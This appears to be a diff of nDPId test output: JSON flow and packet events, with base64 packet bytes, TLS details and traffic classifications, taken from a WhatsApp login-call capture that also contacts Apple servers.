-00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1432582230648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582230648,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAZppAAEAGvV7AqAIEEa1CZsA0AbuMr4Y\/AAAAALAC\/\/\/iDQAAAgQFtAEDAwQBAQgKLfo7WAAAAAAEAgAA"} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1432582230787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582230787,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0jEsAAO8GKLkRrUJmwKgCBAG7wDR81DyUjK+GQIASH\/6qEgAAAgQFoAEDAwQBAQQC"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1432582230854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582230854,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLotAAEAG9YXAqAIEEa1CZsA0AbuMr4ZAfNQ8lVAQQADKywAA"} -00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582230648,"flow_last_seen":1432582230862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582230862,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582230648,"flow_last_seen":1432582231003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582231003,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582233314,"flow_last_seen":1432582233314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582233314,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1432582233314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233314,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0kh5AAEAGATfAqAIEXbqHCMAoAFBgmxszxhyTY4ARIABAdgAAAQEICi36RbdjLQIx"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1432582233380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233380,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0ewoAADkGX0tduocIwKgCBABQwCjGHJNjYJsbNIAQAebnbwAAAQEICmMteVEt+kW3"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1432582233490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233490,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0ewsAADkGX0pduocIwKgCBABQwCjGHJNjYJsbNIARAebnAQAAAQEICmMteb4t+kW3"} 
-00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582233751,"flow_last_seen":1432582233751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582233751,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1432582233751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582233751,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoI\/dAAEAG3k\/AqAIEEaxkMcAnAbsMJFozPw\/LbVAR\/\/9EkwAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1432582233884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582233884,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo+xIAAO8GmDMRrGQxwKgCBAG7wCc\/D8ttDCRaNFARn\/6kkwAA"} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1432582233926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582233926,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoy8lAAEAGNn3AqAIEEaxkMcAnAbsMJFo0Pw\/LblAQ\/\/9EkgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582234869,"flow_last_seen":1432582234869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582234869,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1432582234869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582234869,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAohHZAAEAGfc3AqAIEEaxkNMAeAbsiAVkzu7svv1AR\/\/9OvgAA"} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1432582235010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235010,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoaq4AAO4GKZURrGQ0wKgCBAG7wB67uy+\/IgFZNFARn\/6uvgAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1432582235028,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235028,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAosCtAAEAGUhjAqAIEEaxkNMAeAbsiAVk0u7svwFAQ\/\/9OvQAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582235998,"flow_last_seen":1432582235998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582235998,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1432582235998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235998,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLkpAAEAG1AjAqAIEEaxkJcAdAbtiYuGVG2ODH1AR\/\/\/TAgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582235999,"flow_last_seen":1432582235999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582235999,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1432582235999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235999,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoEt9AAEAG713AqAIEEaxkO8AcAbueodpQe0gK3VAR\/\/+2UAAA"} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1432582236140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236140,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoyysAAO8GyCYRrGQlwKgCBAG7wB0bY4MfYmLhllARn\/4zAwAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1432582236144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236144,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoKcoAAO4GanIRrGQ7wKgCBAG7wBx7SArdnqHaUVARn\/4WUQAA"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236282,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLwpAAEAG00jAqAIEEaxkJcAdAbtiYuGWG2ODIFAQ\/\/\/TAQAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236282,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoODNAAEAGygnAqAIEEaxkO8AcAbueodpRe0gK3lAQ\/\/+2TwAA"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227643,"flow_last_seen":1432582227643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227643,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1432582227643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227643,"pkt":"xiwDYGpkAPS5Jrv0CABFAABACXVAAEAGAsTAqAIEuK2zJcAyFGaCPuKZAAAAALAC\/\/9xPwAAAgQFtAEDAwQBAQgKLfov1AAAAAAEAgAA"} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1432582227797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432582227797,"pkt":"APS5Jrv0xiwDYGpkCABFAAA8rYsAADQGqrG4rbMlwKgCBBRmwDLYm8Xcgj7imqAS\/\/9JMQAAAgQFrAEDAwkEAggKD\/GKmy36L9Q="} 
+00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227884,"flow_last_seen":1432582227884,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227884,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1432582227884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227884,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAKwpAAEAG00HAqAIEEbJoDsAzAbunfDOjAAAAALAC\/\/\/+yQAAAgQFtAEDAwQBAQgKLfowvwAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1432582227885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582227885,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0779AAEAGHIXAqAIEuK2zJcAyFGaCPuKa2JvF3YAQIFhWrQAAAQEICi36MMYP8Yqb"} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1432582227886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582227886,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0rZoAAO4G4r4RsmgMwKgCBAG7wDE71dh745uf14ASH\/64\/gAAAgQFoAEDAwQBAQQC"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1432582227887,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582227887,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo79dAAEAGDo7AqAIEEbJoDMAxAbvjm5\/XO9XYfFAQQADZtwAA"} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582227604,"flow_last_seen":1432582227896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1432582227896,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1432582228152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582228152,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0UDkAAO4GQB4RsmgOwKgCBAG7wDON4auhp3wzpIASH\/48GwAAAgQFoAEDAwQBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1432582228167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582228167,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoC8AAAEAGMqTAqAIEEbJoDsAzAbunfDOkAAAAAFAEAADWZAAA"} +01291{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1432582227604,"flow_last_seen":1432582228181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3601,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1432582228181,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","server_names":"*.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ess.apple.com, OU=ISG Delivery Ops, O=Apple Inc., C=US","fingerprint":"BD:E0:62:C3:F2:9D:09:5D:52:D4:AA:60:11:1B:36:1B:03:24:F1:9B"}} +00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1432582228503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1432582228503,"pkt":"xiwDYGpkAPS5Jrv0CABFAAXUnXJAAEAG3ojAqAIEEW7lDsApFGe4aEuG1IsaTIAQIAA3PgAAAQEICi36MxJvhmvfFwMBACDgnfLWgV8g\/pw7jjX\/\/3ZDH1tB+gK1jE9k\/rmu6RmKPhcDAQdQwvKiQZwynx6ML8uHDg8WgbZIBNPdSiBPAiHm7VZMSxjHJ7BGJ8hRCNCOXC6LyliytHBkvL\/WQAE0iyMMgIlOMed9vHW1FQrPwtxifubqT35jWP9Nwm9hOQ2sUXPF6J6ZcqeRRxjts4LAxUp+ZVHbqO88UycvtArFRoKmsjwuTsOHFL0h\/BX9z3nWEUxaS9mVyhudzOuBlhf3aNgcppeJ3Mr6DsSPYDWrJ1Ko6GUQ6Mz7WhKyRp+OhCR+8vNcJ+2CIpa9aPiStGZvZFFuJ5eoJiBK6lrgPDyxxPa\/Z82Zx7iZHY+\/ajmPTXvQU4j7rC5OlL\/ZO1JkHVVmXmK1\/n5cUDYPvmxuWKEEWDx8eNxgRC58OMj0i5sHQHDG+ZLwIW4R3Ebyfp++7DjTwhy7uHM9lVzOAa6qgVVbeWZWLm5Zp4udgSHyIGs6plbNOhN8Lb7TTV3BFKBjCbwxtnCR+8lPTlOVAewtoM48Z0qRSJODl9LDmyJOnkTl+LQlbM7hWhZq\/VVyYDivHB+RnYZFdt7ZvWbMsFi9dXD6LjMsdLkj0RU\/SFA5gXvUGWy9x04Yo\/WqRH7ng0WIs\/oAxdVKAH0RL\/egfgAwRrcRgu3dPMqb8b19+PmNfa+WFGFnW0JLuexKCM9POmeD5yw6nk\/ac9Raq2rKcykqXxndrastmOjTbplC4qeRqr0LASV9tRAtG4WvYwC\/dfTiBawq859mBNGrglJvult9KPMKQPFULDG6x+KBv4eYpxjRc54qoabZQMWqqc+\/C0Emvy+eYJXsquvu+83ilyZ2N5sYlJ92HKH8JfE8JTIg5o3c9zLm5ZWhw8+NmQMwd0i5bU9vg06cROWuAG\/JN1YaR0pdUTITubm5mlduwzPQc2BVmXII2GZu105+s7qlJpQzMmRVjoqYtbOeWHJKIQ4UQdZCqzpz4AcWUN7LNHzsfvI5B8mXgc+B7aL8Y8jc2YqBmFk1dHfnjKeYCxGmRBZHJy7WbY9uViabjXvTq6pmYIGh+8lsYGwBwhWNapwWuc8Bw0b65ZKVGVcMKolOabscbWi+EYPJjuvFKgqZscrMC1dXZUtfdGPsPdXUlxbBMQ2Kup7KMqRXjqDlL2rJPpRC\/J6FfjQ+IKNfM\/RVAKV8teQWPRPthAH1FIrtEy51cDQixMgza8uftMRBKRfqEYXF7XVD5164o\/Mck2RudrQlyQmifMkcXuuW1kb2sTQoTz3p0Ox09YvEjxH+5SXf2MqAQ5cwiqd8fGHwSVuprE4y5B+B+0nEsRucTP\/97X6ZaOAcSRCuPQgdHN1NHCSQ8002IEFsPCRXQaWhb\/8KMjfJXXs1I3Eouoy5fGg9Eon7zV6InzJDOtmcVxRzUBgfDR1DGBIMOusKSnnAX1htfNBhCsM31KRySVA9BnU7p8tKS\/3BfJCTQQBoGTP2MoOx
